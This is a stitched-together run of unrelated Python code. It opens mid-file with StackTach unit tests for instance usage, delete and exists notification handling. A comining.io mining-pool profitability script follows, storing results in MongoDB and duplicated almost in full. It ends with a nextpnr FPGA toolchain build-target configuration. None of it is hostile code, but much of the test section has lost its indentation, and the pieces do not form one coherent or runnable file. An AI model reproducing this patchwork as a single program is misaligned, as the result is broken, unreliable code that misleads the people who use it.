        notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
        return notification
def test_process_usage_for_new_launch_create_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
usage.launched_at = None
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_revert_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_rescue_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_success_message(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
    def test_process_usage_for_updates_create_end_error_message(self):
        """An errored create.end must be ignored — no STACKDB calls expected."""
        notification = self.mox.CreateMockAnything()
        notification.message = 'Error'
        raw = self.mox.CreateMockAnything()
        raw.event = 'compute.instance.create.end'
        # No expectations recorded: any DB access would fail VerifyAll().
        self.mox.ReplayAll()
        views._process_usage_for_updates(raw, notification)
        self.mox.VerifyAll()
def test_process_usage_for_updates_revert_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
    def test_process_delete(self):
        """A delete with both deleted_at and terminated_at creates a record.

        The expectation below is keyed on delete_decimal (derived from
        deleted_at), i.e. deleted_at takes precedence over terminated_at.
        """
        delete_time = datetime.datetime.utcnow()
        terminated_time = delete_time-datetime.timedelta(seconds=1)
        launch_time = delete_time-datetime.timedelta(days=1)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_decimal = utils.decimal_utc(delete_time)
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.deleted_at = str(delete_time)
        notification.terminated_at = str(terminated_time)
        notification.launched_at = str(launch_time)
        raw = self.mox.CreateMockAnything()
        delete = self.mox.CreateMockAnything()
        delete.instance = INSTANCE_ID_1
        delete.launched_at = launch_decimal
        delete.deleted_at = delete_decimal
        # Record phase: exactly one get_or_create plus one save.
        views.STACKDB.get_or_create_instance_delete(
            instance=INSTANCE_ID_1, deleted_at=delete_decimal,
            launched_at=launch_decimal)\
            .AndReturn((delete, True))
        views.STACKDB.save(delete)
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.assertEqual(delete.instance, INSTANCE_ID_1)
        self.assertEqual(delete.launched_at, launch_decimal)
        self.assertEqual(delete.deleted_at, delete_decimal)
        self.mox.VerifyAll()
    def test_process_delete_with_only_terminated_at(self):
        """With deleted_at empty, terminated_at supplies the delete time."""
        delete_time = datetime.datetime.utcnow()
        launch_time = delete_time-datetime.timedelta(days=1)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_decimal = utils.decimal_utc(delete_time)
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        # deleted_at is blank, so the code must fall back to terminated_at.
        notification.deleted_at = ''
        notification.terminated_at = str(delete_time)
        notification.launched_at = str(launch_time)
        raw = self.mox.CreateMockAnything()
        delete = self.mox.CreateMockAnything()
        delete.instance = INSTANCE_ID_1
        delete.launched_at = launch_decimal
        delete.deleted_at = delete_decimal
        views.STACKDB.get_or_create_instance_delete(
            instance=INSTANCE_ID_1, deleted_at=delete_decimal,
            launched_at=launch_decimal)\
            .AndReturn((delete, True))
        views.STACKDB.save(delete)
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.assertEqual(delete.instance, INSTANCE_ID_1)
        self.assertEqual(delete.launched_at, launch_decimal)
        self.assertEqual(delete.deleted_at, delete_decimal)
        self.mox.VerifyAll()
    def test_process_delete_with_neither(self):
        """Intended to cover the case with neither timestamp populated.

        NOTE(review): despite the name, terminated_at is still set below,
        making this byte-for-byte identical to
        test_process_delete_with_only_terminated_at. Confirm whether
        deleted_at = '' AND terminated_at = '' was intended here.
        """
        delete_time = datetime.datetime.utcnow()
        launch_time = delete_time-datetime.timedelta(days=1)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_decimal = utils.decimal_utc(delete_time)
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.deleted_at = ''
        notification.terminated_at = str(delete_time)
        notification.launched_at = str(launch_time)
        raw = self.mox.CreateMockAnything()
        delete = self.mox.CreateMockAnything()
        delete.instance = INSTANCE_ID_1
        delete.launched_at = launch_decimal
        delete.deleted_at = delete_decimal
        views.STACKDB.get_or_create_instance_delete(
            instance=INSTANCE_ID_1, deleted_at=delete_decimal,
            launched_at=launch_decimal)\
            .AndReturn((delete, True))
        views.STACKDB.save(delete)
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.assertEqual(delete.instance, INSTANCE_ID_1)
        self.assertEqual(delete.launched_at, launch_decimal)
        self.assertEqual(delete.deleted_at, delete_decimal)
        self.mox.VerifyAll()
    def test_process_delete_no_launch(self):
        """Deletes without launched_at are ignored: no DB writes occur."""
        delete_time = datetime.datetime.utcnow()
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.deleted_at = str(delete_time)
        notification.launched_at = ''
        raw = self.mox.CreateMockAnything()
        # No STACKDB expectations are recorded, so any DB call would fail
        # the mox verification below.
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.mox.VerifyAll()
    def _create_exists_notification(self, audit_beginning, current_time,
                                    launch_time, deleted_time):
        """Build a mock exists notification using the module's canonical IDs.

        Timestamps are passed in as datetimes and stored as strings,
        mirroring the wire format the real notification carries.
        """
        notification = self.mox.CreateMockAnything()
        notification.launched_at = str(launch_time)
        notification.deleted_at = str(deleted_time)
        notification.audit_period_beginning = str(audit_beginning)
        notification.audit_period_ending = str(current_time)
        notification.tenant = TENANT_ID_1
        notification.os_architecture = OS_ARCH_1
        notification.os_version = OS_VERSION_1
        notification.os_distro = OS_DISTRO_1
        notification.rax_options = RAX_OPTIONS_1
        notification.instance = INSTANCE_ID_1
        notification.instance_type_id = INSTANCE_TYPE_ID_1
        notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
        notification.message_id = MESSAGE_ID_1
        notification.bandwidth_public_out = BANDWIDTH_PUBLIC_OUTBOUND
        return notification
    def test_process_exists(self):
        """An exists event creates an InstanceExists tied to the usage row.

        With deleted_time blank, the created record carries no delete
        reference (no 'deleted_at'/'delete' keys in exists_values).
        """
        current_time = datetime.datetime.utcnow()
        launch_time = current_time - datetime.timedelta(hours=23)
        launch_decimal = utils.decimal_utc(launch_time)
        audit_beginning = current_time - datetime.timedelta(hours=20)
        audit_beginning_decimal = utils.decimal_utc(audit_beginning)
        audit_ending_decimal = utils.decimal_utc(current_time)
        notification = self._create_exists_notification(
            audit_beginning, current_time, launch_time, deleted_time='')
        raw = self.mox.CreateMockAnything()
        usage = self.mox.CreateMockAnything()
        # The usage lookup tolerates sub-second drift: [launched_at, +1s).
        launched_range = (launch_decimal, launch_decimal+1)
        views.STACKDB.get_instance_usage(
            instance=INSTANCE_ID_1,
            launched_at__range=launched_range).AndReturn(usage)
        exists_values = {
            'message_id': MESSAGE_ID_1,
            'instance': INSTANCE_ID_1,
            'launched_at': launch_decimal,
            'audit_period_beginning': audit_beginning_decimal,
            'audit_period_ending': audit_ending_decimal,
            'instance_type_id': INSTANCE_TYPE_ID_1,
            'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
            'usage': usage,
            'raw': raw,
            'tenant': TENANT_ID_1,
            'rax_options': RAX_OPTIONS_1,
            'os_architecture': OS_ARCH_1,
            'os_version': OS_VERSION_1,
            'os_distro': OS_DISTRO_1,
            'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
        }
        exists = self.mox.CreateMockAnything()
        views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
        views.STACKDB.save(exists)
        self.mox.ReplayAll()
        views._process_exists(raw, notification)
        self.mox.VerifyAll()
    def test_process_exists_no_launched_at(self):
        """exists without launched_at is skipped with a warning log."""
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.launched_at = None
        raw = self.mox.CreateMockAnything()
        raw.id = '1'
        self.setup_mock_log()
        # Expect exactly this warning and no STACKDB traffic at all.
        self.log.warn('Ignoring exists without launched_at. RawData(1)')
        self.mox.ReplayAll()
        views._process_exists(raw, notification)
        self.mox.VerifyAll()
    def test_process_exists_with_deleted_at(self):
        """With deleted_at set, the exists record links the delete row too.

        Unlike test_process_exists, exists_values gains 'deleted_at' and
        'delete', and a get_instance_delete lookup is expected.
        """
        current_time = datetime.datetime.utcnow()
        launch_time = current_time - datetime.timedelta(hours=23)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_time = datetime.datetime.utcnow()
        deleted_decimal = utils.decimal_utc(delete_time)
        audit_beginning = current_time - datetime.timedelta(hours=20)
        audit_beginning_decimal = utils.decimal_utc(audit_beginning)
        audit_ending_decimal = utils.decimal_utc(current_time)
        notification = self._create_exists_notification(
            audit_beginning, current_time, launch_time, delete_time)
        raw = self.mox.CreateMockAnything()
        usage = self.mox.CreateMockAnything()
        # Both lookups tolerate sub-second drift: [launched_at, +1s).
        launched_range = (launch_decimal, launch_decimal+1)
        views.STACKDB.get_instance_usage(instance=INSTANCE_ID_1,
                                         launched_at__range=launched_range)\
            .AndReturn(usage)
        delete = self.mox.CreateMockAnything()
        views.STACKDB.get_instance_delete(instance=INSTANCE_ID_1,
                                          launched_at__range=launched_range)\
            .AndReturn(delete)
        exists_values = {
            'message_id': MESSAGE_ID_1,
            'instance': INSTANCE_ID_1,
            'launched_at': launch_decimal,
            'deleted_at': deleted_decimal,
            'audit_period_beginning': audit_beginning_decimal,
            'audit_period_ending': audit_ending_decimal,
            'instance_type_id': INSTANCE_TYPE_ID_1,
            'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
            'usage': usage,
            'delete': delete,
            'raw': raw,
            'tenant': TENANT_ID_1,
            'rax_options': RAX_OPTIONS_1,
            'os_architecture': OS_ARCH_1,
            'os_version': OS_VERSION_1,
            'os_distro': OS_DISTRO_1,
            'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
        }
        exists = self.mox.CreateMockAnything()
        views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
        views.STACKDB.save(exists)
        self.mox.ReplayAll()
        views._process_exists(raw, notification)
        self.mox.VerifyAll()
class StacktachImageUsageParsingTestCase(StacktachBaseTestCase):
    """Glance (image) events delegate persistence to the notification.

    Each _process_glance_* view is expected to make exactly one call on
    the notification object (save_usage / save_delete / save_exists) and
    touch nothing else.
    """

    def setUp(self):
        self.mox = mox.Mox()
        # Replace the real DB facade with a mock for every test.
        views.STACKDB = self.mox.CreateMockAnything()

    def tearDown(self):
        self.mox.UnsetStubs()

    def test_save_image_usage(self):
        # _process_glance_usage must call notification.save_usage(raw).
        raw = self.mox.CreateMockAnything()
        notification = self.mox.CreateMockAnything()
        notification.save_usage(raw)
        self.mox.ReplayAll()
        views._process_glance_usage(raw, notification)
        self.mox.VerifyAll()

    def test_save_image_delete(self):
        # _process_glance_delete must call notification.save_delete(raw).
        raw = self.mox.CreateMockAnything()
        notification = self.mox.CreateMockAnything()
        notification.save_delete(raw)
        self.mox.ReplayAll()
        views._process_glance_delete(raw, notification)
        self.mox.VerifyAll()

    def test_save_image_exists(self):
        # _process_glance_exists must call notification.save_exists(raw).
        raw = self.mox.CreateMockAnything()
        notification = self.mox.CreateMockAnything()
        notification.save_exists(raw)
        self.mox.ReplayAll()
        views._process_glance_exists(raw, notification)
        self.mox.VerifyAll()
COMINING_URL = "https://api.comining.io/?key="
COMINING_KEY = "Your-Comining-Key"
import pymongo
import requests
from datetime import datetime
import time

# API method payloads supported by comining.io.
coinslist = {"method":"coins_list"} #coins list and their profit
coinsreward = {"method":"coins_reward"} #coins rewarded to your account
blocklist = {"method":"blocks_list"}
mininglist = {"method":"mining_list"}
workershash = {"method":"workers_hashrate"}
workerslist = {"method":"workers_list"}
workers = {"method":"workers_summary"}
headers = {'charset': 'utf-8'}


def RESP(opt):
    """POST `opt` to the comining API and return the decoded JSON body."""
    response = requests.post(COMINING_URL + COMINING_KEY, json=opt, headers=headers)
    return response.json()


cnslst = list(RESP(coinslist).get('data'))

conn = pymongo.MongoClient("192.168.1.66", 27017)
db = conn['comining']
blockcoin = db['blockcoin']
pref = db['pref']
coins = db['coins']

for entry in cnslst:
    profit = entry.get('profit')
    # Revenue figures are divided by 10 — presumably a per-10-units-of-
    # hashrate normalization; confirm against the API docs.
    revusd = float('{:.2f}'.format(profit.get('revenue_usd') / 10))
    revcns = float('{:.3f}'.format(profit.get('coins') / 10))
    cns = {'coin': entry.get('coin'), 'baseReward': entry.get('baseReward'),
           'active': entry.get('active'), 'coinIconUrl': entry.get('coinIconUrl'),
           'blockTime': entry.get('blockTime'),
           'blockRevenueUsd': entry.get('blockRevenueUsd'),
           'networkDifficulty': entry.get('networkDifficulty'),
           'networkHashrate': entry.get('networkHashrate'),
           'siteUrl': entry.get('siteUrl'),
           'workersHashrate': entry.get('workersHashrate'),
           'revenue_usd': revusd, 'revenue_coins': revcns}
    # Reuse the document instead of rebuilding the same dict literal twice.
    # NOTE(review): Collection.update() is removed in PyMongo 4; migrate to
    # update_one(..., upsert=True) so new coins are also inserted.
    coins.update({'coin': entry.get('coin')}, cns)
    if entry.get('active') == True:
        cnt = float('{:.2f}'.format(revcns / float(entry.get('baseReward'))))
        # Map the reward ratio onto a preference tier (highest match wins).
        for threshold, tier in ((100, 10), (50, 6), (40, 5), (30, 4),
                                (20, 3), (10, 2), (1, 1)):
            if cnt >= threshold:
                cnt = tier
                break
        else:
            cnt = 0
        pref.update({'coin': entry.get('coin')},
                    {'coin': entry.get('coin'), 'count': cnt,
                     'coincounter': 'conter coin'})
COMINING_KEY = "Your-Comining-Key"
import pymongo
import requests
from datetime import datetime
import time

# API method payloads supported by comining.io.
coinslist = {"method":"coins_list"} #coins list and their profit
coinsreward = {"method":"coins_reward"} #coins rewarded to your account
blocklist = {"method":"blocks_list"}
mininglist = {"method":"mining_list"}
workershash = {"method":"workers_hashrate"}
workerslist = {"method":"workers_list"}
workers = {"method":"workers_summary"}
headers = {'charset': 'utf-8'}


def RESP(opt):
    """POST `opt` to the comining API and return the decoded JSON body."""
    response = requests.post(COMINING_URL + COMINING_KEY, json=opt, headers=headers)
    return response.json()


cnslst = list(RESP(coinslist).get('data'))

conn = pymongo.MongoClient("192.168.1.66", 27017)
db = conn['comining']
blockcoin = db['blockcoin']
pref = db['pref']
coins = db['coins']

for entry in cnslst:
    profit = entry.get('profit')
    # Revenue figures are divided by 10 — presumably a per-10-units-of-
    # hashrate normalization; confirm against the API docs.
    revusd = float('{:.2f}'.format(profit.get('revenue_usd') / 10))
    revcns = float('{:.3f}'.format(profit.get('coins') / 10))
    cns = {'coin': entry.get('coin'), 'baseReward': entry.get('baseReward'),
           'active': entry.get('active'), 'coinIconUrl': entry.get('coinIconUrl'),
           'blockTime': entry.get('blockTime'),
           'blockRevenueUsd': entry.get('blockRevenueUsd'),
           'networkDifficulty': entry.get('networkDifficulty'),
           'networkHashrate': entry.get('networkHashrate'),
           'siteUrl': entry.get('siteUrl'),
           'workersHashrate': entry.get('workersHashrate'),
           'revenue_usd': revusd, 'revenue_coins': revcns}
    # Reuse the document instead of rebuilding the same dict literal twice.
    # NOTE(review): Collection.update() is removed in PyMongo 4; migrate to
    # update_one(..., upsert=True) so new coins are also inserted.
    coins.update({'coin': entry.get('coin')}, cns)
    if entry.get('active') == True:
        cnt = float('{:.2f}'.format(revcns / float(entry.get('baseReward'))))
        # Map the reward ratio onto a preference tier (highest match wins).
        for threshold, tier in ((100, 10), (50, 6), (40, 5), (30, 4),
                                (20, 3), (10, 2), (1, 1)):
            if cnt >= threshold:
                cnt = tier
                break
        else:
            cnt = 0
        pref.update({'coin': entry.get('coin')},
                    {'coin': entry.get('coin'), 'count': cnt,
                     'coincounter': 'conter coin'})
from src.base import SourceLocation, Target
# -- nextpnr itself ---------------------------------------------------------

SourceLocation(name='nextpnr', vcs='git',
               location='https://github.com/YosysHQ/nextpnr',
               revision='origin/master')

# Native build-time tool that compiles .bba chip databases.
Target(name='nextpnr-bba', sources=['nextpnr'], build_native=True,
       gitrev=[('nextpnr', 'bba')])


def _nextpnr_target(name, extra_deps=(), extra_sources=(), **kwargs):
    # Every nextpnr architecture target shares the python3 runtime
    # dependency, the bba tool dependency, and the nextpnr license file;
    # only the arch-specific deps/sources/package differ.
    Target(name=name,
           sources=['nextpnr'] + list(extra_sources),
           dependencies=['python3', 'nextpnr-bba'] + list(extra_deps),
           resources=['python3'],
           license_file='nextpnr/COPYING',
           **kwargs)


_nextpnr_target('nextpnr-generic')
_nextpnr_target('nextpnr-ice40', extra_deps=['icestorm-bba'], package='ice40')
_nextpnr_target('nextpnr-ecp5', extra_deps=['prjtrellis-bba'], package='ecp5')
# machxo2 uses the same prjtrellis base, hence the 'ecp5' package.
_nextpnr_target('nextpnr-machxo2', extra_deps=['prjtrellis-bba'], package='ecp5')
_nextpnr_target('nextpnr-nexus', extra_deps=['prjoxide-bba'], package='nexus')
_nextpnr_target('nextpnr-mistral', extra_sources=['mistral'])

# -- architecture-specific bitstream projects -------------------------------

for _proj, _url in (
        ('icestorm', 'https://github.com/YosysHQ/icestorm'),
        ('prjtrellis', 'https://github.com/YosysHQ/prjtrellis'),
        ('prjoxide', 'https://github.com/gatecat/prjoxide'),
        ('mistral', 'https://github.com/Ravenslofty/mistral')):
    SourceLocation(name=_proj, vcs='git', location=_url,
                   revision='origin/master')

for _proj, _pkg in (('icestorm', 'ice40'),
                    ('prjtrellis', 'ecp5'),
                    ('prjoxide', 'nexus')):
    Target(name=_proj, sources=[_proj],
           license_file=_proj + '/COPYING', package=_pkg)

# -- chip databases (.bba), built natively ----------------------------------

Target(name='icestorm-bba', sources=['nextpnr'], dependencies=['icestorm'],
       gitrev=[('nextpnr', 'ice40')], build_native=True)
Target(name='prjtrellis-bba', sources=['prjtrellis', 'nextpnr'],
       gitrev=[('nextpnr', 'ecp5'), ('nextpnr', 'machxo2')],
       build_native=True)
